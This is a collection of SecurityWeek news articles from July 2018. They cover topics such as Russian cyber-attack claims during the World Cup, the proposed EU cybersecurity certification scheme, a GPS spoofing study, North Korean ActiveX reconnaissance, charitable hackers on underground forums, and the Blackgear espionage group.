19.7.2018 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.

Proposed EU Cybersecurity Product Certification Scheme Has Global Effects
19.7.2018 securityweek Cyber

The European Union is active in passing cybersecurity legislation ostensibly for the European Union but with worldwide ramifications. The General Data Protection Regulation (GDPR), and the Payment Services Directive 2 (PSD2) are recent examples. This process is similar on a global scale to California on a U.S. federal scale -- the respective markets are so important that vendors tend to comply generally.

There is more coming from the EU: the proposed Cybersecurity Act (9350/18) (PDF). On July 10, the proposal passed one of the major hurdles for new legislation when it was approved by the European Parliament's Industry Committee by 55 votes to five with one abstention. The key features of the proposal are to give more authority, budget and responsibility to the European Union Agency for Network and Information Security (ENISA); and to develop "European cybersecurity certification schemes for the purpose of ensuring an adequate level of cybersecurity of ICT processes, products and services in the Union."

The likelihood of the proposal proceeding to binding legislation can be gauged by the Industry Committee's reaction: it seeks to strengthen the proposal by making the certification mandatory for the critical infrastructure industries (the original proposal does not require certification, suggesting it should be voluntary). At this stage we do not know the details of the final outcome, but we can be fairly certain that there will be a new unified European certification scheme designed, developed and operated by ENISA.

The scope of the certification scheme is wide. Title III, paragraph 2 of the Act states, "The European cybersecurity certification framework defines a mechanism to establish European cybersecurity certification schemes and to attest that the ICT processes, products and services that have been evaluated in accordance with such schemes comply with specified security requirements with the aim to protect the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the functions or services offered by, or accessible via, those products, processes, and services throughout their life cycle." It covers both traditional computer devices and the connected devices that comprise the Internet of Things (IoT).

The intention seems to be for ENISA to develop three levels of product assurance: basic, substantial and high.

The Cybersecurity Act generates mixed feelings, especially among non-EU companies operating or trading with Europe. There have been, and still are, many different security product certification schemes worldwide; and some feel that this will be just another burden placed on device manufacturers. Ilia Kolochenko, CEO of High-Tech Bridge is unsure of the need for a new scheme.

"Based on the information currently available about the ENISA certification," he told SecurityWeek, "I cannot see any substantially new or significantly better approach to cybersecurity or privacy compared to numerous already existing certifications, regulations or international standards such as ISO 27001."

The danger in new, locally-based, requirements is that they can further balkanize any attempts at global harmonization -- and given current global political and economic tensions, the result could do more harm than good. "In light of the escalating tariff war between the US and Europe," Kolochenko continued, "further segmentation of cybersecurity certifications and accreditations will inevitably bring more confusion and add unnecessary complexity -- let alone Russia or China with their own rules of the game. Different communities of experts will compete to make their standard slightly better, instead of joining their efforts to bring a unified global set of simple but efficient rules."

In August 2017, the IOT Cybersecurity Coalition wrote to the European Commission offering advice and voicing concerns. For example, it urges the EU to 'leverage existing best practices and global industry-led standards'.

"This avoids burdening multinational enterprises with the requirements of conflicting jurisdictions while facilitating interoperability, compatibility, reliability, and security on a global scale." This is part of the 'regulations inhibit innovation' argument. The Coalition fears that existing voluntary efforts "would be stymied by the slow and unitary nature of the EU standards development process should the EU move forward with mandatory standards, testing, and labelling requirements. Meanwhile, threat actors will continue to innovate unhindered."

Kolochenko touches on this concern. "One should be careful not to overestimate the value of a certification. Certification is merely a beautiful facade, behind which there is a reality. We have seen quite a few breaches of PCI DSS certified merchants and similarly notorious cases." He is concerned that industry will spend more time on ensuring that products they use are correctly certified than on ensuring their digital premises are really secure. "Paper security may undermine practical security," he said.

The Coalition considers the potential for a false sense of security based on trust labels that could potentially have been issued several years earlier to be a concern. "Specifically," it says, "we remain concerned that pushing for generic or blanket cybersecurity labelling of IoT products could result in counterproductive technology mandates, new market access barriers, or roadblocks to innovation without necessarily bringing any real security or privacy benefits that could not otherwise be achieved on the basis of already existing instruments."

In February this year, AmCham EU (the American Chamber of Commerce to the European Union, claiming to be the voice of American business in Europe) published its own critique of the Cybersecurity Act. It welcomes the plan to convert ENISA into a permanent EU cybersecurity agency with greater power and resources, but urges the agency to strengthen its collaboration with industry "in an inclusive and transparent way."

AmCham has major reservations over the effect of certification on industry. "The framework should be voluntary and market-driven in nature as companies should be able to develop the security system features best for their unique risk situation... The proposal should also take into account the possibility of self-declaration."

Kolochenko doesn't think this is likely -- or if initially possible, it will necessarily remain so. "Of course, it’s a question of how the certification will be used and where it will be mandatory, but one may reasonably assume that European governmental entities and some companies will require it -- and prefer it to NIST or any foreign standards that have existed for more than a decade."

Transparency -- or its lack -- is as much a concern for AmCham as it is for the IOT Cybersecurity Coalition. "The proposed process lacks provisions for adequate transparency and openness, and is ultimately not reflecting the provisions and best practices under the WTO Agreement on Technical Barriers to Trade."

Some concerns seem to have been met. "The limitation of the applicability of certifications to a maximum of three years under Article 48.6 is particularly problematic," says AmCham. The current draft proposal has struck out "a maximum period of three years" and replaced it with "the period defined by the particular certification scheme". Nevertheless, this concern links back to the 'false sense of security' concern: a product may have been in compliance when it was tested, but how can you guarantee it is still in compliance, or not vulnerable to a newly discovered zero-day vulnerability today?

Indeed, this raises a further legal or at least moral complication. If a product fails to meet its description, there is potential for legal action against the manufacturer. But if a product has been 'guaranteed' by ENISA certification and still fails, who is liable: the manufacturer, ENISA or the European Commission?

It would be wrong, however, to suggest that the proposed certifications are completely without support. "I welcome any initiative to increase the security and assurance of ICT products," comments Ed Williams, director EMEA of SpiderLabs at Trustwave; "given the current climate this legislation is welcome... ICT products can be difficult and complex: ensuring that security is baked in could, initially, be difficult but is clearly the correct thing to do -- secure by design is a must in 2018 and moving forward. I, for one," he added, "hope that this certification framework is successful in raising what is currently a low bar. Good luck!"

Russia's National Vulnerability Database Slow, Incomplete
19.7.2018 securityweek BigBrothers

Russia’s national vulnerability database is slow, incomplete and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either considering that the agency is not a public service organization, as its main mission is to protect state and critical infrastructure systems and support counter intelligence initiatives.

The most likely scenario, Recorded Future believes, is that the DBU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.

Researchers Stealthily Manipulate Road Navigation Systems
19.7.2018 securityweek CyberCrime

A team of researchers from Virginia Tech, the University of Electronic Science and Technology of China, and Microsoft Research has discovered a new and stealthy GPS spoofing method that has been proven to be highly effective against road navigation systems.

GPS spoofing has been around for many years. This attack method can in theory be used to trick drivers into going to an arbitrary location, but in practice the instructions provided by the targeted navigation system often contradict the physical road (e.g. make a left turn on a highway), making it less likely to work in a real-world scenario.

Researchers now claim to have discovered a more efficient method that is less likely to raise suspicion. Using this technique an attacker could trick the victim into following an incorrect route (e.g. cause ambulances and police cars to enter a loop route), deviate a targeted vehicle to a specific location, or cause the target to enter a dangerous situation (e.g. enter a highway the wrong way).

For the attack to work, the attacker needs to know the target’s approximate destination and the most likely victim of this technique would be an individual who in not familiar with the area.

Using 600 real-world taxi routes from Manhattan and Boston, the researchers have created an algorithm that generates a virtual route mimicking the shape of real roads. The attack is most likely to work in a city where road networks are dense.

The attacker creates false GPS signals in an effort to set the final location to a nearby “ghost location.” The navigation system recalculates the new route, which researchers have dubbed the “ghost route,” and guides the victim, turn-by-turn, to the ghost location.

In order to avoid raising suspicion, the ghost route is generated based on the collected taxi trips. The search algorithm is run at each road segment in an effort to identify all possible attack (ghost) locations. During tests, the algorithm identified, on average, roughly 1,500 potential attack routes for each trip.

New GPS spoofing attack

“The algorithm crafts the GPS inputs to the target device such that the triggered navigation instruction and displayed routes on the map remain consistent with the physical road network,” researchers said in their paper.

In some cases, if the original location is not on the route to the ghost location, the user may be informed by the navigation system that the route is being recalculated, but researchers have determined based on a survey that it might not raise too much suspicion considering that this can often occur in a real-world scenario.

These types of attacks can be carried out using a portable GPS spoofer, which costs roughly $200, from a distance of 40-50 meters (130-160 feet). The attacker can either follow the targeted vehicle or place the spoofer inside or under the targeted car and control it remotely.

The researchers reproduced the attack in a real-world scenario using their own car, which they drove after midnight in suburban areas to avoid causing any problems. They also asked 40 individuals (20 in the U.S. and 20 in China) to use a driving test simulator that was attacked via the newly discovered method. The attack’s success rate was 95%, with only one Chinese and one U.S. participant detecting the attack.

Compliance-Focused Cybersecurity Firm A-LIGN Raises $54.5 Million
19.7.2018 securityweek IT

A-LIGN, a provider of cybersecurity and compliance solutions, announced this week that it has raised $54.5 million from growth equity firm FTV Capital.

Tampa, Florida-based A-LIGN provides assessments, audits and cyber risk advisory and testing services for companies of all sizes. Using its flagship platform, A-SCEND, the company helps organizations address third-party risks, security controls, and privacy concerns, with a focus in four core areas:

• Compliance Assessments: SSAE 18, SOC I, II, III audits, and assessments;

• Industry Specific Audits such as ISO, PCI, HITRUST, HIPAA;

• Cybersecurity Services: Penetration testing, vulnerability scanning; and

• Cyber Risk and Privacy: GDPR, CCPA, related privacy and incident planning services.

“Evolving security frameworks and the continual release of new regulations and compliance requirements, such as GDPR, SOC I/II/III, and the recently-passed California Consumer Privacy Act, require that company executives constantly examine their data privacy practices,” Scott Price, CEO of A-LIGN, said in a statement. “Organizations across all industries are conducting critical assessment and audits not only for mandated compliance but also to deepen trust among customers and users which has a direct impact on the bottom line.”

A-LIGN is a licensed CPA firm, Qualified Security Assessor Company (QSAC), accredited ISO 27001 certification body, certified HITRUST Assessor firm, and accredited FedRAMP 3PAO. The company’s tools help customers streamline the audit and certification process through workflow automation, document management, and auditing history.

As part of the transaction, FTV Capital partner Liron Gitig and managing partner Richard Garman will join the company’s board of directors.

North Korean Hackers Launch New ActiveX Attacks
19.7.2018 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploitnig an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitors’ operating system and browser and check for ActiveX and running plugins from a specific list of ActiveX components if Internet Explorer was detected.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code to connect websocket to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.

At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.2018 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face to face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.

Symantec Launches Email Threat Isolation Solution
19.7.2018 securityweek IT

Symantec on Tuesday unveiled a new solution designed to help protect enterprises against email-based attacks using threat isolation.

According to the security firm, the new Email Threat Isolation technology can block advanced email attacks, including spear phishing, credential theft and account takeover attempts, and ransomware.

The solution creates what Symantec describes as a secure remote execution environment between the user and the potentially malicious content.

Specifically, Email Threat Isolation sends traffic from the links included in suspicious emails to this secure environment. All potentially malicious elements remain confined in this isolated environment while the user is only shown a safe visual representation of the content.

The solution can also render websites in read-only mode, which helps prevent employees from entering sensitive information, such as corporate credentials, on a phishing website.

Email Threat Isolation is available as a cloud-based or on-premises service, and it can be used with Symantec Email Security or third-party email security solutions.

“Despite significant efforts by our industry to detect and block email-borne threats, messaging remains the primary vector for malware and scams within the enterprise. The industry requires a paradigm shift to properly secure messaging, and we are excited to be bringing the innovation of integrated isolation technology to email,” said Greg Clark, CEO of Symantec.

“This revolutionary technology helps enterprises to quickly and easily isolate all malicious email content – both internal and external – to substantially reduce inherent risks within messaging applications. Further, because the technology is cloud-based, organizations can be up and running quickly and easily, reducing stress on already taxed IT teams,” Clark added.

Security Instrumentation Firm Verodin Raises $21 Million
19.7.2018 securityweek IT

Verodin, a Virginia-based company that helps organizations assess the effectiveness of their cybersecurity controls, on Tuesday announced that it has raised $21 million in a Series B funding round.

The round was led by TenEleven Ventures and Bessemer Venture Partners (BVP), with participation from Capital One Growth Ventures, Citi Ventures and all existing investors. As part of the deal, TenEleven Ventures founder Mark Hatfield will join the company’s board of directors.

The company says it will use the funds to continue the development of its Security Instrumentation Platform (SIP), increase hiring in all functional areas, and expand global sales.

“Boards and C-level executives increasingly want evidence that the dollars and effort they spend on cyber defenses are actually working,” said TenEleven Ventures’ Hatfield. “Verodin is leading a revolutionary shift in cybersecurity, delivering organizations the evidence they need to measure, manage and improve their cybersecurity effectiveness.”

The latest funding round brings the total raised by Verodin to $34 million. The company secured $10 million in a Series A funding round in June 2016.

While the Series B round was officially announced only on Tuesday, the funding was actually revealed in late June when a SEC filing showed that the company had raised roughly $20.7 million from 14 investors. The company refused to make any comments at the time.

Verodin SIP is deployed in an organization’s IT environment and it continuously tests the effectiveness of endpoint, cloud, email and network controls. The solution helps enterprises ensure that the products they have purchased and deployed are actually protecting business-critical assets.

Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.2018 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.

Charitable Hackers Collaborate in Deep Web Forums
19.7.2018 securityweek Hacking

Through Multiple Methods and Collaborations, Many Hackers Donate Money to Good Causes

Sun Tzu is a cliche in cybersecurity, but no less valid for that. He wrote, "If you know the enemy and know yourself, you need not fear the result of a hundred battles." Security researchers infiltrate the deep web forums to understand both the enemy and his weapons -- and sometimes they can be surprised by what they find.

Last month, Trustwave's SpiderLabs blog posted a discussion on the cybercriminal members of underground forums with the title, 'Underground Code of Honor'. In this blog is brief mention of hackers' charitable works. Now Ziv Mador, VP of security research at Trustwave, has given SecurityWeek more details of a well-organized charitable element found in numerous deep web forums.

He explained that Trustwave was investigating the modular structure of the underground. Different groups specialize in specific aspects of cybercrime and sell their products or services to other groups. One group might specialize in running botnets and botnet servers. Another might specialize in developing malware -- and each might sell their services to the other to meet a specific demand.

During this research, the researchers came across charity-themed communications; and decided to investigate further. "And the more we delved," said Mador, "the more fascinating it became. We found that through multiple methods and collaborations these hackers actually donate a lot of money to good causes." The most frequent donations, he said, are for orphanages and hospitals (especially children's hospitals).

Trustwave particularly looked at three different forums: two Russian-speaking and one English-speaking. There were immediate differences. In the English-speaking forum, charitable donations tended be from individuals. In the Russian-speaking forums they were collaborative campaigns. This could be partly cultural (individualism versus team working) or partly economic (eastern European hackers really needing to collaborate in order to collect sufficient funds).

Whatever the reasons, however, the Russian-speaking hackers have developed relatively sophisticated 'giving campaigns'. "Near the Russian new year (7 January), they ran a campaign and used the money raised to buy equipment for hospitals and supplies for orphanages." The hospital equipment included stretchers, inhalers, and bacteria-killing lamps." They even have plans to buy heart-rate monitors; and are working with a contractor to remodel a particular department in one particular hospital.

The orphanage supplies included toiletries such as hair brushes, tooth brushes and toothpaste. With money left over, they bought 25 kilos of fresh fruit, since 'sweets are not healthy for the kids'. These supplies were delivered by hand (about 15 bags full), and photographic evidence of the hand-over, and the kids, were posted as proof to the forum.

If all this seems just a little bit 'Robin Hood', it's a comparison not lost to the hackers themselves. "Anyone can become a modern Robin Hood" one hacker posted to the forum. But perhaps the most intriguing charitable act has been the development of a 'needy support' capability. "They have established a process in one of the forums," explained Mador, "where parents of children who are sick and the families are poor, can submit a request for support. So, if a child needs some medication or surgery and the parents cannot pay for it, they can submit a request for support with supporting documents -- and there is a very specific post in one of the underground forums specifying exactly what documents are needed to get support from the forum."

It's not just the members that get involved. One forum promises to donate half the money it collects to the charitable work. It gets this from two primary sources -- using the forum for advertising; and through arbitration services. "If two forum members get into conflict," said Mador; "let's say one bought a service from another one, and promises were not fulfilled, they go to arbitration. Here the forum administrator will work with them to decide on who is right and who is wrong; and to determine any compensation. Part of that compensation goes to the arbitration fund -- and part of that goes to charity."

One of the forums publishes a list of donators and amounts. The names are obviously false or online handles -- but some individuals can still be recognized. Petr Severa donated more than $100. He is now better known as Peter Yuryevich Levashov, after being arrested while holidaying in Spain and extradited to the U.S. He is now awaiting trial in Connecticut on eight charges, and faces 50 years in jail.

As the cybercriminals' charitable work grows, so too does a need for improved administration. "In one of the forums," said Mador, "it was suggested that since this charitable work takes time and effort, it needed a manager to manage the whole process. It was further suggested that they should hire a woman -- and it specifically had to be a woman -- to manage the funds. They also mentioned that their 'punchers' would check the candidates' information." Punchers are people in the criminal underground who have expertise in getting confidential information about people -- so the candidates should expect a pretty invasive background check on their credentials.

The picture painted really is one of the romantic Robin Hood idea: robbing the rich to pay the poor. Mador doesn't accept this, finding the situation to be more ironic than romantic. It would take an analysis by psychologists and sociologists to understand the causes and motives behind the rise of underground charitable work; but Mador does concede that there may be an element of cultural patriotism among some of the Russian and eastern European hackers.

Ilia Kolochenko, CEO of High-Tech Bridge, sees nothing attractive in the phenomenon -- he finds it alarming and an indication of a growing breakdown in government authority and increasing anarchy. "The substance of the charity is certainly laudable and justified. However," he told SecurityWeek, "it also serves as a harbinger of the global cybersecurity crisis. Governments and law authorities are unable to protect their citizens in the digital space anymore. Cybercriminals are undermining governmental authority by helping indigent people abandoned by the state. What will be the next? Cybercriminals offering private protection in the digital space for a reasonable cost affordable to the citizens? Governments will lose their authority and power, and Robin Hoods will reign.”

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.

Downward Trend in Healthcare Ransomware Attacks May be Temporary
19.7.2018 securityweek 

Confirming a trend noted by other researchers, a new report from network security firm Cryptonite notes that ransomware incidents have declined over the last six months.

Cryptonite's Healthcare Cyber Research Report (H1, 2018) draws its conclusions from an analysis of 'IT/Hacking' incidents reported to the Health and Human Services Office of Civil Rights (HHS/OCR) between January 1, 2018 and June 30, 2018, supplemented by its own research.

The report (PDF) notes that ransomware events impacting more than 500 patient data records dropped from 19 in the first half of 2017 to eight in the first half of 2018 -- a decrease of 57%. At the same time, however, the number of patient records (ePHI) breached in the first half of 2018 has increased from 1,674,793 in the first half of 2017 to 1,928,432 in the first half of 2018.

The implication is that while ransomware is not currently either the most favored or most successful method of attacking the healthcare industry, the attraction of patient record data is as strong as ever.

"Medical records," explains the report, "are prime targets, as this data is highly prized to support identity theft and financial fraud. Medical records are an attractive commodity on the dark web where they demand high premiums from criminal purchasers."

Cryptonite believes that one of the reasons for the decline in ransomware is general improvements in healthcare security. "Customers have started to add micro-segmentation to networks, as well as specialized software to address ransomware threats. In general, in the largest hospitals, new Zero Trust technologies have been added to the existing mix of defense in depth technologies to expand and harden the defensive perimeters."

However, it suspects that this may be only a temporary respite. "We do believe that ransomware still presents a formidable threat to healthcare and expect new variants, such as AI based malware, to present very difficult challenges to healthcare institutions later in 2018 and into 2019."

At the beginning of 2018, MIT Technology Review published 'Six Cyber Threats to Really Worry About in 2018'. One of these is the weaponization of artificial intelligence. Hackers, it suggested, are "likely to use AI to help design malware that's even better at fooling 'sandboxes', or security programs that try to spot rogue code before it is deployed in companies' systems."

It is the potential weaponization of AI to support ransomware that Cryptonite feels might fuel a resurgence of ransomware attacks over the next year.

In the meantime, Britton White, security & HIPAA compliance advisor at Fortified Health Security, fears that any reported decline in ransomware is likely to give a false sense of optimism -- and potentially lead healthcare organizations to relax their vigilance. "I've not seen anyone address ransomware in their security training and awareness program or disaster recovery plan," he told SecurityWeek. "In the state of Tennessee just two weeks ago, a breach notice was sent out to thousands of people due to a local Memphis organization getting hit with ransomware. Adding to it, they're a business associate to a number of major hospitals in the area, so they had to be notified as well. It's a huge mess."

While the number of ransomware attacks has decreased over last year, the number of breached patient records has grown from 1,767,955 in the second half of 2017 to 1,928,432 in the first half of 2018 -- an increase of 9.08%. "The positive trend in reduction of the use of ransomware is overshadowed by the continued high volume of major attacks," says Cryptonite. "Healthcare insurers, hospitals... and a broad variety of other important health entities such as surgical centers, skilled nursing facilities, urology centers, vision surgical centers, cancer treatment centers, MRI/CT-scan centers and diagnostic laboratories fall victim to these attacks every month."

But White points out that these statistics are official numbers only. "Bottom line is, ransomware continues to be a huge problem for all healthcare organizations. How many healthcare organizations haven't reported being hit with ransomware? I'd imagine they'd prefer to remain off the radar as much as possible," he told SecurityWeek. "Everyone needs to remain vigilant and ensure they have the ability to recover as quickly as possible if/when they get hit."

Rockville, Maryland-based Cryptonite emerged from stealth mode in October 2017. A spin-off of Maryland defense contractor Intelligent Automation (IAI), Cryptonite is led by President and CEO Michael Simon, and Justin Yackoski, CTO and former lead researcher at IAI.

'Blackgear' Cyberspies Resurface With New Tools, Techniques
19.7.2018 securityweek CyberSpy

The hackers behind a cyberespionage campaign known as Blackgear are back with improved malware that abuses social media websites, including Facebook, for command and control (C&C) communications.

The threat group, also known as Topgear and Comnie, has been around since at least 2008, mainly targeting entities in Taiwan, South Korea and Japan. Their objectives include organizations in the telecommunications, defense, government, aerospace, and high-tech sectors. Some limited evidence suggests that the attacks may be conducted by Chinese state-sponsored actors.

Previous Blackgear attacks involved malware tracked as Elirks and Protux, which the hackers created themselves. The latest attacks, analyzed by Trend Micro, relied on a new version of the Protux backdoor and a downloader named Marade.

One interesting technique leveraged by the threat group involves using blogs and social media websites for C&C communications, which helps it easily change C&C servers and improve its chances of evading detection. In the past, the actor posted encrypted C&C configurations on websites such as github.com, tumblr.com and blogspot.com. The more recent attacks also abuse Facebook to store and retrieve C&C data.

Blackgear malware abuses Facebook for C&C communications

